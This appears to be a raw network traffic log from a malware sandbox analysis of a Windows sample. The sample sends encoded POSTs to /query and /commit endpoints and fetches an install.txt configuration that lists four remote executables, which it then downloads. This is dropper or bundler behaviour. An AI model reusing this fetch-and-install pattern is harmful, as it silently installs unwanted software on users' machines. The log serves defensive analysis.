HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016551091911494410110713
Server: Apache
tracecode: 00016551091911494410110713
Set-Cookie: BAIDUID=69DAC83DF6D595A311E23693EE9228DF:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008213770658453514110713
Server: Apache
tracecode: 00008213770658453514110713
Set-Cookie: BAIDUID=32F3C5706F8B24028AF7668DD8FF2F78:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
.#4H........................................!#$%&"k." ,-.
3234!~ :9:;[email protected]_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m... ..........&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z& ,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."[email protected].;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00137261760315632138110713
Server: Apache
tracecode: 00137261760315632138110713
Set-Cookie: BAIDUID=67699F784E2A0D23D0594A86343DB7B0:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00101112390271667466110713
Server: Apache
tracecode: 00101112390271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15F5DD3D9CDD70F255F:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
GET /invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: dlied6.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 05:00:16 GMT
Expires: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=0
Content-Length: 89
Location: hXXp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exeThe actual URL is '/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_1
0_9_16345_222.exe'...
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024935640818948618110713
Server: Apache
tracecode: 00024935640818948618110713
Set-Cookie: BAIDUID=B2053B857F2258D2E04896EB7F862B42:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
GET /fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: c.pc.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: HTTP Load Balancer/2.0
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
Cache-Control: no-cache
Pragma: no-cache9 pYvSlibR11BBHT94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihkt
DkjBh41ybhkE A/W QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX mlyOKd4C7W
/vxy330jna us6KFWIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0mu
XpsiZuySxm5Wh6cwBxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQh
eKnfk2DFlZTRBhcBWHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4Qo
eIR1MCS1aFzbmqfyFWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2S
s6wZfJIGJ5kkNsbpkw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWv
Toloip OFdM7c2MsfWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZ
PEHWBjsAwZ7C4BpbNAwzEiZOeQ64AqfWW4KoaGYH7H49zIVSkhD9CP8GV2fHUnI1sX Bpt
P6c6PW5IEkjTob5lyfr/oyNgpdc4lJ4md9NfI0LdgPHTTP/1.1 200 OK..Date: Sat,
07 Nov 2015 05:00:15 GMT..Server: HTTP Load Balancer/2.0..Last-Modifie
d: Thu, 01 Jan 1970 00:00:00 GMT..Content-Length: 672..Keep-Alive: tim
eout=5, max=100..Connection: Keep-Alive..Content-Type: application/oct
et-stream..Cache-Control: no-cache..Pragma: no-cache..9 pYvSlibR11BBHT
94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihktDkjBh41ybhkE A/W
QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX mlyOKd4C7W/vxy330jna us6KF
WIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0muXpsiZuySxm5Wh6cw
BxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQheKnfk2DFlZTRBhcB
WHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4QoeIR1MCS1aFzbmqfy
FWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2Ss6wZfJIGJ5kkNsbp
kw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWvToloip OFdM7c2Ms
fWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZPEHWBjsAwZ7C<<< skipped >>>
GET /17476535.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1862
Content-Type: application/x-javascript
Last-Modified: Fri, 07 Aug 2015 04:22:10 GMT
Accept-Ranges: bytes
ETag: "cc562aa1c8d0d01:339f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 Nov 2015 04:44:38 GMT
Connection: closedocument.write ('<a href="hXXp://VVV.51.la/?17476535" target="_blan
k" title="51.La 网站流量统计ߏ
B;统">网站统计</a>\n');..var a6
535tf="51la";var a6535pu="";var a6535pf="51la";var a6535su=window.loca
tion;var a6535sf=document.referrer;var a6535of="";var a6535op="";var a
6535ops=1;var a6535ot=1;var a6535d=new Date();var a6535color="";if (na
vigator.appName=="Netscape"){a6535color=screen.pixelDepth;} else {a653
5color=screen.colorDepth;}..try{a6535tf=top.document.referrer;}catch(e
){}..try{a6535pu =window.parent.location;}catch(e){}..try{a6535pf=wind
ow.parent.document.referrer;}catch(e){}..try{a6535ops=document.cookie.
match(new RegExp("(^| )a6535_pages=([^;]*)(;|$)"));a6535ops=(a6535ops=
=null)?1: (parseInt(unescape((a6535ops)[2])) 1);var a6535oe =new Date(
);a6535oe.setTime(a6535oe.getTime() 60*60*1000);document.cookie="a6535
_pages=" a6535ops ";path=/;expires=" a6535oe.toGMTString();a6535ot=do
cument.cookie.match(new RegExp("(^| )a6535_times=([^;]*)(;|$)"));if(a6
535ot==null){a6535ot=1;}else{a6535ot=parseInt(unescape((a6535ot)[2]));
a6535ot=(a6535ops==1)?(a6535ot 1):(a6535ot);}a6535oe.setTime(a6535oe.
getTime() 365*24*60*60*1000);document.cookie="a6535_times=" a6535ot ";
path=/;expires=" a6535oe.toGMTString();}catch(e){}..try{if(document.co
okie==""){a6535ops=-1;a6535ot=-1;}}catch(e){}..a6535of=a6535sf;if(a653
5pf!=="51la"){a6535of=a6535pf;}if(a6535tf!=="51la"){a6535of=a6535tf;}a
6535op=a6535pu;try{lainframe}catch(e){a6535op=a6535su;}..a6535src=<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008958911911494410110713
Server: Apache
tracecode: 00008958911911494410110713
Set-Cookie: BAIDUID=32F3C5706F8B2402BD0EB1E10803435C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK.. ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033318230271667466110713
Server: Apache
tracecode: 00033318230271667466110713
Set-Cookie: BAIDUID=37CF03EF72C69E44B1D413F21243AFB1:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016873191213477898110713
Server: Apache
tracecode: 00016873191213477898110713
Set-Cookie: BAIDUID=69DAC83DF6D595A39DEA8B5044D5BB76:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..
GET /package/201511/7c9ddd8b4b286eef807bc97513948574.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP3/2.0.13
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: application/octet-stream
Content-Length: 7981400
Connection: keep-alive
ETag: "5638867b-79c958"
Last-Modified: Tue, 03 Nov 2015 10:03:39 GMT
Expires: Fri, 19 Oct 2018 09:08:15 GMT
Age: 244305
Cache-Control: max-age=93312000
Accept-Ranges: bytes
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024709301213477898110713
Server: Apache
tracecode: 00024709301213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D27384FF197E418516:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK.. ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049372701213477898110713
Server: Apache
tracecode: 00049372701213477898110713
Set-Cookie: BAIDUID=6D7EF984AD0193644A842C3587268107:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991293201911494410110712
Server: Apache
tracecode: 35991293201911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BB9311240B7EFFFDC:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
GET /tool/install.txt HTTP/1.1
User-Agent: DownUpLoad
Host: conf.a101.cc
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 12:58:57 GMT
Content-Type: application/octet-stream
Content-Length: 344
Last-Modified: Wed, 04 Nov 2015 09:04:40 GMT
Connection: keep-alive
ETag: "5639ca28-158"
Accept-Ranges: bytes
[field0]
url=hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe
[field1]
url=hXXp://download.suxiazai.com/for_down/2013/install1393485.exe
[field2]
url=hXXp://mm.appkhh.com/mmliao/MM-liao8863.exe
[field3]
url=hXXp://j.br.baidu.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe
[common]
number=4
filename=qq|rx|mm|bd
GET /invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe HTTP/1.1
Host: dlied6.qq.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 04:59:58 GMT
Expires: Sat, 07 Nov 2015 04:59:58 GMT
Cache-Control: max-age=0
Content-Length: 73
Location: hXXp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe
The actual URL is '/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe'
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK.. ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117949801911494410110713
Server: Apache
tracecode: 00117949801911494410110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA0573611A9CC38E2099E:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00080725311213477898110713
Server: Apache
tracecode: 00080725311213477898110713
Set-Cookie: BAIDUID=DA04B4066DA68D7200C3C53637253F4C:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00109337490271667466110713
Server: Apache
tracecode: 00109337490271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15FE3D46D7CEF95CB13:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00025792010818883082110713
Server: Apache
tracecode: 00025792010818883082110713
Set-Cookie: BAIDUID=B2053B857F2258D266D348C433DA33B2:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?# 7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008202790818883082110713
Server: Apache
tracecode: 00008202790818883082110713
Set-Cookie: BAIDUID=32F3C5706F8B24028DF67F10D2BD5887:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: rf-ht h0-s1127.p11-fra ( h0-s1214.p11-fra), ht h0-s1214.p11-fra.cdngp.net
ETag: "5506987c-1ede"
Cache-Control: max-age=7200
Expires: Sat, 07 Nov 2015 05:23:11 GMT
Age: 5838
Content-Length: 7902
Content-Type: image/gif
Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT
Connection: keep-alive
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049406280658453514110713
Server: Apache
tracecode: 00049406280658453514110713
Set-Cookie: BAIDUID=6D7EF984AD0193644126EE9989BC78F5:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
GET /for_down/2013/install1393485.exe HTTP/1.1
Host: download.suxiazai.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 4787104
Date: Thu, 29 Oct 2015 05:44:24 GMT
Content-Type: application/octet-stream
ETag: "a88697daded0d01:608b2"
Server: Microsoft-IIS/6.0
Last-Modified: Fri, 07 Aug 2015 07:01:16 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Age: 774938
Via: http/1.1 fnop003-GDSTDX-CT-248-102 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-158 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-165 (ACA/2.0 ACA_HIT)
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999987180581376522110712
Server: Apache
tracecode: 35999987180581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B79939E6BDE03F0EE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00136416251213477898110713
Server: Apache
tracecode: 00136416251213477898110713
Set-Cookie: BAIDUID=67699F784E2A0D23E0CC41DD2DA72AC7:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
GET /ptlogin/ver/10139/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: ms h0-s1127.p11-fra ( h0-s1129.p11-fra), ht h0-s1129.p11-fra.cdngp.net
ETag: "5636be2e-21f8"
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:00:41 GMT
Age: 588
Content-Length: 3459
Content-Type: application/x-javascript
Content-Encoding: gzip
Vary: Accept-Encoding
Last-Modified: Mon, 02 Nov 2015 01:36:46 GMT
Connection: keep-alive
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00000046110818948618110713
Server: Apache
tracecode: 00000046110818948618110713
Set-Cookie: BAIDUID=32F3C5706F8B2402C2AC3D655372071C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?# 7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
